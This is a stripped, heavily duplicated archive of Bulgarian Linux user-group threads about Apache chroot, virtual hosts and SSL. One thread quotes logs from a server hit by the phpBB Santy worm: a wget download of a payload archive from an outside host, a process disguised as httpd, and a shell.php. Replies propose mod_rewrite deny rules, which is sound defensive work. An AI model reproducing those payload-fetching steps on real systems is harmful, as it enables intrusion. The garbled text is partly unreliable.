1100K .. .. .. 100% 8.34 KB/s 13:46:37 (10.07 KB/s) - `bin.tar.gz' saved [1153967/1153967] == Fakename: /usr/sbin/httpd PidNum: 12821 [Tue Dec 21 20:01:50 2004] [notice] SIGHUP received. Attempting to restart [Tue Dec 21 20:01:59 2004] [notice] Digest: generating secret for digest authentication ... [Tue Dec 21 20:01:59 2004] [notice] Digest: done [Tue Dec 21 20:11:39 2004] [notice] Apache/2.0.40 (Red Hat Linux) configured -- resuming normal operations [Tue Dec 21 20:11:39 2004] [info] Server built: Feb 25 2003 05:01:56 [Tue Dec 21 20:11:39 2004] [debug] /usr/src/build/228504-i386/BUILD/httpd-2.0.40/server/mpm/prefork/prefork.c(1039): AcceptMutex: sysvsem (default: sysvsem) String found where operator expected at m1ho2of line 2, near $ts[int(rand(@ts))] . ' (Might be a runaway multi-line '' string starting on line 1) (Missing semicolon on previous line?) syntax error at m1ho2of line 2, near $ts[int(rand(@ts))] . ' Bad name after D' at m1ho2of line 2. String found where operator expected at m1ho2of line 2, near $ts[int(rand(@ts))] . ' (Might be a runaway multi-line '' string starting on line 1) (Missing semicolon on previous line?) syntax error at m1ho2of line 2, near $ts[int(rand(@ts))] . ' Bad name after D' at m1ho2of line 2. String found where operator expected at m1ho2of line 2, near $ts[int(rand(@ts))] . ' (Might be a runaway multi-line '' string starting on line 1) (Missing semicolon on previous line?) syntax error at m1ho2of line 2, near $ts[int(rand(@ts))] . ' Bad name after D' at m1ho2of line 2. [--cut--] shell.php :) ( ) ...,... , . , A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html A mail-list of Linux Users Group - Bulgaria
Re: lug-bg: Apache + chroot + many vdomains
www.freevps.com Virtual server technology is a cost effective solution that allows running many virtually isolated standalone servers on one host box and thus saves hardware related capital investments. *FreeVPS* is a free Linux based software which extends the vserver solution http://www.linux-vserver.org/ with a series of improvements. * complete root access http://www.freevps.com/overview.html#root * full-featured system administration as of a physical server http://www.freevps.com/overview.html#sysadmin * complete independence http://www.freevps.com/overview.html#independence * own network configuration http://www.freevps.com/overview.html#network * limitable resource consumption http://www.freevps.com/overview.html#limits * shared administrative tasks http://www.freevps.com/overview.html#administrative * master admin management http://www.freevps.com/overview.html#admin * complete integration with H-Sphere http://www.freevps.com/overview.html#integration FreeVPS is released under the *GNU General Public License (GPL) http://www.gnu.org/copyleft/gpl.html*. az se razhvurliah v 3 e-maila, no vie i bez tova prez praznicite ne ste mnogo aktivni :P Danail Petrov wrote: , , apache ( ) /fakeroot , /fakeroot ? apache, : This site is defaced!!! NeverEverNo Sanity WebWorm generation 18 default index.html.. ,1 , ... . .php ( 'eXoops'): --13:44:45-- http://dhaenk.port5.com/bin.tar.gz = `bin.tar.gz' Resolving dhaenk.port5.com... done. Connecting to dhaenk.port5.com[212.15.85.21]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 1,153,967 [application/x-tar] 0K .. .. .. .. .. 4% 14.48 KB/s 50K .. .. .. .. .. 8% 12.15 KB/s 100K .. .. .. .. .. 13% 9.07 KB/s 150K .. .. .. .. .. 17% 11.07 KB/s 200K .. .. .. .. .. 22% 10.29 KB/s 250K .. .. .. .. .. 26% 14.41 KB/s 300K .. .. .. .. .. 31% 9.25 KB/s 350K .. .. .. .. .. 35% 7.07 KB/s 400K .. .. .. .. .. 39% 13.14 KB/s 450K .. .. .. .. .. 44% 10.39 KB/s 500K .. .. .. .. .. 48% 7.16 KB/s 550K .. .. .. .. .. 53% 10.24 KB/s 600K .. .. .. .. .. 57% 10.99 KB/s 650K .. .. .. .. .. 62% 12.40 KB/s 700K .. .. .. .. .. 66% 6.04 KB/s 750K .. .. .. .. .. 70% 16.13 KB/s 800K .. .. .. .. .. 75% 8.19 KB/s 850K .. .. .. .. .. 79% 8.18 KB/s 900K .. .. .. .. .. 84% 6.03 KB/s 950K .. .. .. .. .. 88% 11.16 KB/s 1000K .. .. .. .. .. 93% 27.44 KB/s 1050K .. .. .. .. .. 97% 16.55 KB/s 1100K .. .. .. 100% 8.34 KB/s 13:46:37 (10.07 KB/s) - `bin.tar.gz' saved [1153967/1153967] == Fakename: /usr/sbin/httpd PidNum: 12821 [Tue Dec 21 20:01:50 2004] [notice] SIGHUP received. Attempting to restart [Tue Dec 21 20:01:59 2004] [notice] Digest: generating secret for digest authentication ... [Tue Dec 21 20:01:59 2004] [notice] Digest: done [Tue Dec 21 20:11:39 2004] [notice] Apache/2.0.40 (Red Hat Linux) configured -- resuming normal operations [Tue Dec 21 20:11:39 2004] [info] Server built: Feb 25 2003 05:01:56 [Tue Dec 21 20:11:39 2004] [debug] /usr/src/build/228504-i386/BUILD/httpd-2.0.40/server/mpm/prefork/prefork.c(1039): AcceptMutex: sysvsem (default: sysvsem) String found where operator expected at m1ho2of line 2, near $ts[int(rand(@ts))] . ' (Might be a runaway multi-line '' string starting on line 1) (Missing semicolon on previous line?) syntax error at m1ho2of line 2, near $ts[int(rand(@ts))] . ' Bad name after D' at m1ho2of line 2. String found where operator expected at m1ho2of line 2, near $ts[int(rand(@ts))] . ' (Might be a runaway multi-line '' string starting on line 1) (Missing semicolon on previous line?) syntax error at m1ho2of line 2, near $ts[int(rand(@ts))] . ' Bad name after D' at m1ho2of line 2. String found where operator expected at m1ho2of line 2, near $ts[int(rand(@ts))] . ' (Might be a runaway multi-line '' string starting on line 1)
lug-bg: Apache + chroot + many vdomains
, , apache ( ) /fakeroot , /fakeroot ? apache, : This site is defaced!!! NeverEverNo Sanity WebWorm generation 18 default index.html.. ,1 , ... . .php ( 'eXoops'): --13:44:45-- http://dhaenk.port5.com/bin.tar.gz = `bin.tar.gz' Resolving dhaenk.port5.com... done. Connecting to dhaenk.port5.com[212.15.85.21]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 1,153,967 [application/x-tar] 0K .. .. .. .. .. 4% 14.48 KB/s 50K .. .. .. .. .. 8% 12.15 KB/s 100K .. .. .. .. .. 13% 9.07 KB/s 150K .. .. .. .. .. 17% 11.07 KB/s 200K .. .. .. .. .. 22% 10.29 KB/s 250K .. .. .. .. .. 26% 14.41 KB/s 300K .. .. .. .. .. 31% 9.25 KB/s 350K .. .. .. .. .. 35% 7.07 KB/s 400K .. .. .. .. .. 39% 13.14 KB/s 450K .. .. .. .. .. 44% 10.39 KB/s 500K .. .. .. .. .. 48% 7.16 KB/s 550K .. .. .. .. .. 53% 10.24 KB/s 600K .. .. .. .. .. 57% 10.99 KB/s 650K .. .. .. .. .. 62% 12.40 KB/s 700K .. .. .. .. .. 66% 6.04 KB/s 750K .. .. .. .. .. 70% 16.13 KB/s 800K .. .. .. .. .. 75% 8.19 KB/s 850K .. .. .. .. .. 79% 8.18 KB/s 900K .. .. .. .. .. 84% 6.03 KB/s 950K .. .. .. .. .. 88% 11.16 KB/s 1000K .. .. .. .. .. 93% 27.44 KB/s 1050K .. .. .. .. .. 97% 16.55 KB/s 1100K .. .. .. 100% 8.34 KB/s 13:46:37 (10.07 KB/s) - `bin.tar.gz' saved [1153967/1153967] == Fakename: /usr/sbin/httpd PidNum: 12821 [Tue Dec 21 20:01:50 2004] [notice] SIGHUP received. Attempting to restart [Tue Dec 21 20:01:59 2004] [notice] Digest: generating secret for digest authentication ... [Tue Dec 21 20:01:59 2004] [notice] Digest: done [Tue Dec 21 20:11:39 2004] [notice] Apache/2.0.40 (Red Hat Linux) configured -- resuming normal operations [Tue Dec 21 20:11:39 2004] [info] Server built: Feb 25 2003 05:01:56 [Tue Dec 21 20:11:39 2004] [debug] /usr/src/build/228504-i386/BUILD/httpd-2.0.40/server/mpm/prefork/prefork.c(1039): AcceptMutex: sysvsem (default: sysvsem) String found where operator expected at m1ho2of line 2, near $ts[int(rand(@ts))] . ' (Might be a runaway multi-line '' string starting on line 1) (Missing semicolon on previous line?) syntax error at m1ho2of line 2, near $ts[int(rand(@ts))] . ' Bad name after D' at m1ho2of line 2. String found where operator expected at m1ho2of line 2, near $ts[int(rand(@ts))] . ' (Might be a runaway multi-line '' string starting on line 1) (Missing semicolon on previous line?) syntax error at m1ho2of line 2, near $ts[int(rand(@ts))] . ' Bad name after D' at m1ho2of line 2. String found where operator expected at m1ho2of line 2, near $ts[int(rand(@ts))] . ' (Might be a runaway multi-line '' string starting on line 1) (Missing semicolon on previous line?) syntax error at m1ho2of line 2, near $ts[int(rand(@ts))] . ' Bad name after D' at m1ho2of line 2. [--cut--] shell.php :) ( ) ...,... , . , A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
Re: lug-bg: Apache + chroot + many vdomains
Danail Petrov wrote: : This site is defaced!!! NeverEverNo Sanity WebWorm generation 18 , phpbb, viewtopic.php, urldecode highlite. , . : RewriteEngine On RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR] RewriteCond %{QUERY_STRING} ^(.*)esystem(.*) RewriteRule ^.*$ -- +---+ | Kiril Todorov + System::Network Administrator | +---+ | /* waiting... dreaming... wishing... */ | +---+ A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
Re: lug-bg: Apache + chroot + many vdomains
, - phpBB. worm,2.0.11. : http://www.kb.cert.org/vuls/id/497400 phpBB, ( ) : RewriteEngine On RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR] RewriteCond %{QUERY_STRING} ^(.*)esystem(.*) RewriteRule ^.*$- [F] On Wednesday 22 December 2004 09:56, Danail Petrov wrote: , , apache ( ) /fakeroot , /fakeroot ? apache, : This site is defaced!!! NeverEverNo Sanity WebWorm generation 18 default index.html.. ,1 , ... . .php ( 'eXoops'): --13:44:45-- http://dhaenk.port5.com/bin.tar.gz = `bin.tar.gz' Resolving dhaenk.port5.com... done. Connecting to dhaenk.port5.com[212.15.85.21]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 1,153,967 [application/x-tar] 0K .. .. .. .. .. 4% 14.48 KB/s 50K .. .. .. .. .. 8% 12.15 KB/s 100K .. .. .. .. .. 13% 9.07 KB/s 150K .. .. .. .. .. 17% 11.07 KB/s 200K .. .. .. .. .. 22% 10.29 KB/s 250K .. .. .. .. .. 26% 14.41 KB/s 300K .. .. .. .. .. 31% 9.25 KB/s 350K .. .. .. .. .. 35% 7.07 KB/s 400K .. .. .. .. .. 39% 13.14 KB/s 450K .. .. .. .. .. 44% 10.39 KB/s 500K .. .. .. .. .. 48% 7.16 KB/s 550K .. .. .. .. .. 53% 10.24 KB/s 600K .. .. .. .. .. 57% 10.99 KB/s 650K .. .. .. .. .. 62% 12.40 KB/s 700K .. .. .. .. .. 66% 6.04 KB/s 750K .. .. .. .. .. 70% 16.13 KB/s 800K .. .. .. .. .. 75% 8.19 KB/s 850K .. .. .. .. .. 79% 8.18 KB/s 900K .. .. .. .. .. 84% 6.03 KB/s 950K .. .. .. .. .. 88% 11.16 KB/s 1000K .. .. .. .. .. 93% 27.44 KB/s 1050K .. .. .. .. .. 97% 16.55 KB/s 1100K .. .. .. 100% 8.34 KB/s 13:46:37 (10.07 KB/s) - `bin.tar.gz' saved [1153967/1153967] == Fakename: /usr/sbin/httpd PidNum: 12821 [Tue Dec 21 20:01:50 2004] [notice] SIGHUP received. Attempting to restart [Tue Dec 21 20:01:59 2004] [notice] Digest: generating secret for digest authentication ... [Tue Dec 21 20:01:59 2004] [notice] Digest: done [Tue Dec 21 20:11:39 2004] [notice] Apache/2.0.40 (Red Hat Linux) configured -- resuming normal operations [Tue Dec 21 20:11:39 2004] [info] Server built: Feb 25 2003 05:01:56 [Tue Dec 21 20:11:39 2004] [debug] /usr/src/build/228504-i386/BUILD/httpd-2.0.40/server/mpm/prefork/prefork.c( 1039): AcceptMutex: sysvsem (default: sysvsem) String found where operator expected at m1ho2of line 2, near $ts[int(rand(@ts))] . ' (Might be a runaway multi-line '' string starting on line 1) (Missing semicolon on previous line?) syntax error at m1ho2of line 2, near $ts[int(rand(@ts))] . ' Bad name after D' at m1ho2of line 2. String found where operator expected at m1ho2of line 2, near $ts[int(rand(@ts))] . ' (Might be a runaway multi-line '' string starting on line 1) (Missing semicolon on previous line?) syntax error at m1ho2of line 2, near $ts[int(rand(@ts))] . ' Bad name after D' at m1ho2of line 2. String found where operator expected at m1ho2of line 2, near $ts[int(rand(@ts))] . ' (Might be a runaway multi-line '' string starting on line 1) (Missing semicolon on previous line?) syntax error at m1ho2of line 2, near $ts[int(rand(@ts))] . ' Bad name after D' at m1ho2of line 2. [--cut--] shell.php :) ( ) ...,... , . , === = A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html === = A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara
Re: lug-bg: Apache + chroot + many vdomains
On Wed, Dec 22, 2004 at 09:56:15AM +0200, Danail Petrov wrote: , , apache ( ) /fakeroot , /fakeroot ? ... ** Apache . :) apache, : This site is defaced!!! NeverEverNo Sanity WebWorm generation 18 BugTraq- worm, phpBB. // phpBB-, , m1ho2of - worm-, .: http://www.securityfocus.com/archive/1/385139/2004-12-19/2004-12-25/0 default index.html.. ,1 , ... . .php ( 'eXoops'): [snip ] shell.php :) ( ) ...,... , . , , . chroot-, ( root), chroot- - , , , , :) , Apache , . ( ) ,chroot , Apache child , - , chroot- , ,... , , , :( ... - :) Apache.. reverse proxy, 80 ( ) /. mod_rewrite mod_proxy - , chroot- , content, ,chroot-content. :) mod_proxy mod_rewrite . , -- Peter Pentchev [EMAIL PROTECTED][EMAIL PROTECTED][EMAIL PROTECTED] PGP key:http://people.FreeBSD.org/~roam/roam.key.asc Key fingerprint FDBA FD79 C26F 3C51 C95E DF9E ED18 B68D 1619 4553 Thit sentence is not self-referential because thit is not a word. pgpA2RJT9N3IB.pgp Description: PGP signature
Re: lug-bg: Apache + chroot + many vdomains
Peter Pentchev wrote: ... - :) Apache.. reverse proxy, 80 ( ) /. mod_rewrite mod_proxy - , chroot- , content, ,chroot-content. :) mod_proxy mod_rewrite . , , . , securityfocus/bugtracks :) Best Regards, Danail Petrov A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
Re: lug-bg: Apache + chroot + many vdomains
On Wednesday 22 December 2004 09:56, Danail Petrov wrote: , , apache ( ) /fakeroot , /fakeroot ? mod_chroot. ChrootDir, DocumentRoot. PHP, MySQL .. -- Nikola ANTONOV, Linux for Bulgarians (http://linux-bg.org) -- Public GnuPG key at http://wwwkeys.pgp.net http://ftp.logos-bg.net/pub/Linux-BG.org/GPG_Keys/ Fingerprint: AD64 2468 0AB4 B298 E7E3 92DA 15F5 7AC5 A05E 0F63 -- pgpd5LisTYAcj.pgp Description: PGP signature
Re: lug-bg: Apache + chroot + many vdomains
On Wed, Dec 22, 2004 at 01:32:52PM +0200, Nikola Antonov wrote: On Wednesday 22 December 2004 09:56, Danail Petrov wrote: , , apache ( ) /fakeroot , /fakeroot ? mod_chroot. ChrootDir, DocumentRoot. PHP, MySQL .. .. - , ** Apache, chroot, :) : http://core.segfault.pl/~hobbit/mod_chroot/install.html Configuration (Apache 1.3 and Apache 2.0) mod_chroot provides only one configuration directive - ChrootDir. It can only be used in main server configuration. You can't put ChrootDir inside a Directory, Files, Location, VirtualHost sections or .htaccess files. mod_chroot :) , -- Peter Pentchev [EMAIL PROTECTED][EMAIL PROTECTED][EMAIL PROTECTED] PGP key:http://people.FreeBSD.org/~roam/roam.key.asc Key fingerprint FDBA FD79 C26F 3C51 C95E DF9E ED18 B68D 1619 4553 because I didn't think of a good beginning of it. pgpBQwF15LHjF.pgp Description: PGP signature
Re: lug-bg: Apache + chroot + many vdomains
On , 2004-12-22 at 09:56 +0200, Danail Petrov wrote: , , apache ( ) /fakeroot , /fakeroot ? , - suexec, chroot, - php,pl, cgi ... , .. . signature.asc Description: This is a digitally signed message part
Re: lug-bg: Apache + chroot + many vdomains
On Wednesday 22 December 2004 14:03, Peter Pentchev wrote: .. - , ** Apache, chroot, :) ,- ChrootDir . -- Nikola ANTONOV, Linux for Bulgarians (http://linux-bg.org) -- Public GnuPG key at http://wwwkeys.pgp.net http://ftp.logos-bg.net/pub/Linux-BG.org/GPG_Keys/ Fingerprint: AD64 2468 0AB4 B298 E7E3 92DA 15F5 7AC5 A05E 0F63 -- pgpW2Cks1miAP.pgp Description: PGP signature
Re: lug-bg: Apache s dinamichna konfiguraciq
, 2004-05-31 07:40, Marian Marinov : , -... ... : kill -USR1 `cat /patch/to/apache/pid-file` :) mod_vhost_alias ... :) -, apache. signature.asc Description: This is a digitally signed message part
Re: lug-bg: Apache s dinamichna konfiguraciq
httpd.conf-a - ... , - httpd.conf - -... -... : Include /etc/apache/vhosts/*.vh .vh ... 100% - . mod_vhost_alias ! On Monday 31 May 2004 11:04, Vasil Kolev wrote: , 2004-05-31 07:40, Marian Marinov : , -... ... : kill -USR1 `cat /patch/to/apache/pid-file` :) mod_vhost_alias ... :) -, apache. A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
Re: lug-bg: Apache s dinamichna konfiguraciq
, 2004-05-31 11:25, Marian Marinov : httpd.conf-a - ... , - httpd.conf - -... -... : Include /etc/apache/vhosts/*.vh .vh ... 100% - . mod_vhost_alias ! . apache apache2 reload ( ), apache mod_vhost_alias ( - , symlink- ), aolserver, thttpd, ... , include ,. , update web ( ), , . signature.asc Description: This is a digitally signed message part
Re: lug-bg: Apache s dinamichna konfiguraciq
On Monday 31 May 2004 11:25, Marian Marinov wrote: httpd.conf-a - ... , - httpd.conf - -... -... : Include /etc/apache/vhosts/*.vh .vh ... 100% - . mod_vhost_alias ! http.conf VirtualDocumentRoot /common/www/%0/htmls VirtualScriptAlias /common/www/%0/cgi-bin . Vhosts . . /common/www/test1.com/html/index.html /common/www/test2.com/html/index.html On Monday 31 May 2004 11:04, Vasil Kolev wrote: , 2004-05-31 07:40, Marian Marinov : , -... ... : kill -USR1 `cat /patch/to/apache/pid-file` :) mod_vhost_alias ... :) -, apache. === = A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html === = -- .''`. Debian : :' : GNU/Linux `. `'` `- A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
Re: lug-bg: Apache s dinamichna konfiguraciq
, 2004-05-31 19:24, Marian Marinov : On Monday 31 May 2004 19:13, Nick Kirchev wrote: . /common/www/test1.com/html/index.html /common/www/test2.com/html/index.html ... ( / ://. :)) :( ( )... redirect-? .htaccess AllowOverride:) signature.asc Description: This is a digitally signed message part
Re: lug-bg: Apache s dinamichna konfiguraciq
On Monday 31 May 2004 19:50, Vasil Kolev wrote: , 2004-05-31 19:24, Marian Marinov : On Monday 31 May 2004 19:13, Nick Kirchev wrote: . /common/www/test1.com/html/index.html /common/www/test2.com/html/index.html ... ( / ://. :)) :( ( )... redirect-? .htaccess AllowOverride:) : - ... redirect-. -... ... kxbd Alt+Shift ... A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
Re: lug-bg: Apache s dinamichna konfiguraciq
, 2004-05-31 20:08, Marian Marinov : : - ... redirect-. -... ... . .htaccess -, . ... kxbd Alt+Shift ... - , X- ? , XF86Config-4: Section InputDevice Identifier Keyboard0 Driver keyboard Option XkbRules xfree86 Option XkbModel pc102 Option XkbLayout en_US,bg Option XkbVariantphonetic Option XkbOptionsgrp:switch,grp:caps_toggle EndSection signature.asc Description: This is a digitally signed message part
lug-bg: Apache s dinamichna konfiguraciq
, . ... . - httpd.conf-a ... , . - -... ! . A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
Re: lug-bg: Apache s dinamichna konfiguraciq
, -... ... : kill -USR1 `cat /patch/to/apache/pid-file` :) . A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
lug-bg: Re: lug-bg: apache /
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 , apache / DocumentRoot, 404. , . Directory / . security feature, Forbidden(403)?, DocumentRoot. : VirtualHost 192.168.5.5 ServerName root.williams DocumentRoot / /VirtualHost ... , encode: r-x user- / apache-. Directory / Options Indexes /Direcotry Location / Options Indexes /Location A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
Re: lug-bg: apache /
, . Alias / /tatata. log- : VirtualHost 192.168.5.5 ErrorLog /var/log/apache2/root.williams-error_log CustomLog /var/log/apache2/root.williams-accessess_log common . ServerName root.williams DocumentRoot / /VirtualHost . -, -- Lubomir Haralampiev -Mail: [EMAIL PROTECTED] Sava Chankov wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 , apache / DocumentRoot, 404. , . Directory / . security feature, Forbidden(403)?, DocumentRoot. : VirtualHost 192.168.5.5 ServerName root.williams DocumentRoot / /VirtualHost - -- Sava Chankov A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
lug-bg: apache /
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 , apache / DocumentRoot, 404. , . Directory / . security feature, Forbidden(403)?, DocumentRoot. : VirtualHost 192.168.5.5 ServerName root.williams DocumentRoot / /VirtualHost - -- Sava Chankov research and development http://www.blueboard.biz -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.2-rc1-SuSE (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFAjp3O/0GUBTXAE64RAkKzAKCQwJXCkfJBAjsvKHXu9TyKRGuYiACgm62S LMtsj+hBbm2o+cubUVtAwzg= =sYRl -END PGP SIGNATURE- A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
lug-bg: Apache expert
zdravejte ... opitvam se da predifiniram edna error stranica na Apache no taka i ne moga da otkria koi i e nomera moje li niakoj da pomigne sas malko help. apacheto redirektva kam Weblogic i iskam da napravia taka che kato umre Weblogica dase poiaviava moia error page greshkata e: Failure of server APACHE bridge: Cannot connect to the server: timed out after 10 seconds Build date/time: Jun 3 2002 12:39:07 Change Number: 187328 Emo __ Do you Yahoo!? Protect your identity with Yahoo! Mail AddressGuard http://antispam.yahoo.com/whatsnewfree A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
lug-bg: Apache 2
, :) , 1.3. 2.0. :) A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
Re: lug-bg: Apache 2
Raboti si mnogo dobre. Edinstveniq problem koito lichno sum imal beshe s mod_ssl. Ne mojah da podkaram virtualhosts sus https. -- Konstantin Angelov [EMAIL PROTECTED] ICQ# 21034161 It was Fri, 31 Oct 2003 10:29 when Tsvetin Vasilev said: , :) , 1.3. 2.0. :) A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
Re: lug-bg: Apache 2
ami ako si se machil da go varjesh na named hosts (bez ip) niama da stane.. BIVOL - Original Message - From: Konstantin Angelov [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Friday, October 31, 2003 5:06 PM Subject: Re: lug-bg: Apache 2 Raboti si mnogo dobre. Edinstveniq problem koito lichno sum imal beshe s mod_ssl. Ne mojah da podkaram virtualhosts sus https. -- Konstantin Angelov [EMAIL PROTECTED] ICQ# 21034161 It was Fri, 31 Oct 2003 10:29 when Tsvetin Vasilev said: , :) , 1.3. 2.0. :) A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
Re: lug-bg: Apache 2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Tsvetin Vasilev wrote: , :) , 1.3. 2.0. :) . apache 2.0.48 php5, libmysql, perl, pgsql, mod ssl/v2,3/tls/, rewrite . -e , request- - . production environment high-end enterprise . maintainer- http . , scalability / posix threading api/, production . native ipv6 /1.3.x /. pcre . , api , . , ;=p. -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.3 (GNU/Linux) iD8DBQE/opliolqlu7MEgE0RAmsbAKDDyOF2EqTIWIYTJ2riuJX60wmtmQCfYr6C 0NaJoGju5ejl72Hgezg6bbs= =wtsj -END PGP SIGNATURE- -- This message has been scanned for viruses and dangerous content by MailScanner, and is believed to be clean. A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
Re: lug-bg: Apache 2
Probvah kakvo li ne, chetoh kade li ne, nakraq pusnah otdelen instance s apache-ssl, koito obslujva samo https zaqvki. -- Konstantin Angelov [EMAIL PROTECTED] ICQ# 21034161 It was Fri, 31 Oct 2003 18:26 when Peter Zyumbilev said: ami ako si se machil da go varjesh na named hosts (bez ip) niama da stane.. BIVOL - Original Message - From: Konstantin Angelov [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Friday, October 31, 2003 5:06 PM Subject: Re: lug-bg: Apache 2 Raboti si mnogo dobre. Edinstveniq problem koito lichno sum imal beshe s mod_ssl. Ne mojah da podkaram virtualhosts sus https. -- Konstantin Angelov [EMAIL PROTECTED] ICQ# 21034161 It was Fri, 31 Oct 2003 10:29 when Tsvetin Vasilev said: , :) , 1.3. 2.0. :) A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
Re: lug-bg: Apache Bandwith
v0.5 raboti idealno, no CVS mi dava segfaults. Niakoi uspiaval li da ia podkoara Yavro Stratsimir Kolchevski wrote: http://sourceforge.net/projects/mod-acct/. mod_accounting is a simple Apache module that can record traffic statistics into a database (bytes in/out per http request). query . HTH, Stratsimir Yavor Shahpasov wrote: Znae li niakoi lesen nachin za sledene na bandwith za apache. I ama niakolko servera s mnogo vhosts. Bih iska da znam a) koi v hosts kolko galta b) koi urls lapat nai mnogo bandwith i drugi podobni neshta. Da se polzva log analizers e nemislimo za tozi sluchai A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html -- Yavor Shahpasov [EMAIL PROTECTED] A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
Re: lug-bg: Apache Bandwith
